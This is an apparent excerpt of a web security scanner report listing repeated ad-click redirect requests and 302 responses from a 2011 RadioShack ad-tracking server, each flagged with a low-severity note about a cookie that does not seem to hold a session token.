GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:15 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:11 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:16 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:09 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:06 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:07 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=394936567? HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:09 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=;ord=394936567? Content-Length: 568 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:18 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:23 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:21 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=334085935? HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:19 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=;ord=334085935? Content-Length: 568 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:20 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
